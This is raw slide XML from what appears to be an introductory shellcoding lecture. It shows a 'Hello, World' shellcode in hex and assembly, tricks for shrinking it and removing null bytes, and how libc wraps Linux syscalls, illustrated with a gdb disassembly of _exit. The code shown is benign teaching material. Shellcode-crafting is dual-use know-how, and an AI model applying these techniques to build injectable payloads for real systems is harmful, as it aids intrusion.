                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB0\x04\xB3\x01\x59\xB2\x0D\xCD</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x80\xB0\x01\x31\xDB\xCD\x80\xE8</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xE6\xFF\xFF\xFF\x48\x65\x6C\x6C</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x6F\x2C\x20\x57\x6F\x72\x6C\x64</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x0A"</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill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16419" y="3952323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41</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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Bytes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6C7FD500-83D2-45D8-B1C0-5F588C6F23E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181601" y="4563307"/>
            <a:ext cx="3062814" cy="389688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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74764" y="4498676"/>
            <a:ext cx="4839970" cy="94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00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>No more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF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FF00FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>NULLs!</a:t>
            </a:r>
            <a:endParaRPr sz="3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https://defuse.ca/online-x86-assembler.htm#disassembly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5F9739DC-7E76-48A9-B12F-5C59C849671B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11737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5320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Optimizing Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>World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0148" y="1867371"/>
            <a:ext cx="136525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mini_hello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906144" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  mul  mov  push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7215" y="2115021"/>
            <a:ext cx="918844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ebx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ebx  ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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al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0x0a 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eax</a:t>
            </a:r>
            <a:endParaRPr sz="16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14570" y="3170606"/>
          <a:ext cx="2072639" cy="267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422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push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51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0x646c726f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push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0x57202c6f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push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0x6c6c6548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mov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al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mov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bl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mov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ecx,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-3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esp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mov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dl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0x80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mov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al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xor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ebx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ebx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422">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="167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675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0x80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021789" y="1936202"/>
            <a:ext cx="3222625" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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09089" y="1910080"/>
            <a:ext cx="3241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Machine code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string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constant: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9089" y="2277955"/>
            <a:ext cx="324675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solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xDB\xF7\xE3\xB0\x0A\x50\x68</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x6F\x72\x6C\x64\x68\x6F\x2C\x20</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x57\x68\x48\x65\x6C\x6C\xB0\x04</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB3\x01\x89\xE1\xB2\x0D\xCD\x80</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB0\x01\x31\xDB\xCD\x80"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12CEB1FE-44C7-4662-A01D-A8A452F52343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5926145" y="4343400"/>
            <a:ext cx="3062814" cy="880861"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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85635" y="3751390"/>
            <a:ext cx="2743835" cy="167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1219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38</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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Bytes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065" marR="5080" indent="-1905" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Can you make  this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>smaller?</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="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200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(spoiler: probably</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="12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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>can)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CCAA868B-0363-4C88-A9AD-BA8BF0050B3E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45750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3527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</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Tricks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3274" y="1833204"/>
            <a:ext cx="7046595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xoring anything with itself clears</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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itself:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1007744" indent="457200">
              <a:lnSpc>
                <a:spcPct val="197900"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="1840864" algn="l"/>
                <a:tab pos="2679065" algn="l"/>
                <a:tab pos="3669665" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax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,	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\x31\xC0" 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clear three registers in four</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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bytes:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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71423" y="4096032"/>
          <a:ext cx="6609079" cy="666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6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374">
                <a:tc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sz="24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xor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34340">
                        <a:lnSpc>
                          <a:spcPts val="2260"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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ebx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ebx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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750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mul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34340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ebx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485"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" dirty="0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"\x31\xDB\xF7\xE3"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33274" y="5090747"/>
            <a:ext cx="7548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There’s always more than one way to do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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things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F0645045-8D87-44D0-9516-AFB18E39D340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30185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13B15E1-811F-4C72-9E60-FF6FE3DBAE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6676" y="488791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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="4800" dirty="0"/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53B4B613-1ECD-48A6-8E47-092A24D6EEA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304798" y="3200933"/>
            <a:ext cx="3886200" cy="304267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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9539" y="1739261"/>
            <a:ext cx="3886200" cy="361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 indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pP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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-1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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-2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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Linux System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Calls</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Writing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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Shellcode in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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Additional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Notes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2CFE88F2-897D-4703-9E82-DABF030878CA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59321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41452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Linux System</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Calls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9068" y="1739261"/>
            <a:ext cx="7930515" cy="32302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30530" marR="216535" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="101000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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calls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how userland programs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talk to  the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kernel to do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anything</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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interesting</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" marR="5080" lvl="1" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365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open files, read,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write,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map memory, execute  programs,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etc</a:t>
            </a:r>
            <a:endParaRPr sz="3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Calibri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430530" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="430530" algn="l"/>
                <a:tab pos="431165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libc functions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high level syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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wrappers</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="887730" lvl="1" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="887730" algn="l"/>
                <a:tab pos="888365" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fopen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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sscanf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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>execv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(), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>printf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...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A57E8544-50D2-4336-9415-A8F1F6143330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12642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4342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Libc </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Wraps</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Syscalls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0698" y="2302878"/>
            <a:ext cx="6388735" cy="292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Example of how Libc wraps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Syscalls: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469265">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pP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void </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main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()</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469265">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pP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926465">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit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L="469900">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pP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gcc -masm=intel </a:t>
            </a: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-static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 -o exit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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exit.c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AD9E7134-0B21-48DF-AE4F-BE473F74BCE4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317641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4342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Libc </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Wraps</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Syscalls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9572" y="2069689"/>
            <a:ext cx="428815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gdb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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100699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(gdb) set disassembly-flavor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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intel  (gdb) disas</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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_exit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20503" y="2969886"/>
          <a:ext cx="6725918" cy="1885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411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Dump of assembler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" spc="-8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code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800" spc="-1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function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_exit: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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dbfc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&lt;_exit+0&gt;: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885"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="879475" algn="l"/>
                        </a:tabLst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mo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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v	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="18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eb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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8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DWORD PTR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r>
                        <a:rPr sz="1800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esp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]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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dc00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&lt;_exit+4&gt;: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885"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="879475" algn="l"/>
                        </a:tabLst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mo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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v	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="18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ea</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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85"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0xfc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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dc05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&lt;_exit+9&gt;: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885"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="879475" algn="l"/>
                        </a:tabLst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800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t	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0x80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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dc07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&lt;_exit+11&gt;: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885"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="879475" algn="l"/>
                        </a:tabLst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mo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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v	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="18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ea</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800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85"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>0x1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4">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dc0c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&lt;_exit+16&gt;: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885"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="879475" algn="l"/>
                        </a:tabLst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800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t	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0x80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1">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="188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0x0804dc0e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&lt;_exit+18&gt;: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88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hlt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39553" y="5384382"/>
            <a:ext cx="3718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This is from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The Shellcoder's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Handbook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5737" y="4893446"/>
            <a:ext cx="2660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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0xfc </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit_group()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15737" y="5445895"/>
            <a:ext cx="1781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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit()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039944D-B849-48DF-BF80-292140D23811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176918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5972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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Syscalls in</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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2099" y="1739261"/>
            <a:ext cx="8559800" cy="374102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708025" marR="576580" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="101000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="707390" algn="l"/>
                <a:tab pos="708025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3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>programs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, your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shellcode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needs syscalls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do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anything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Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="3100" dirty="0">
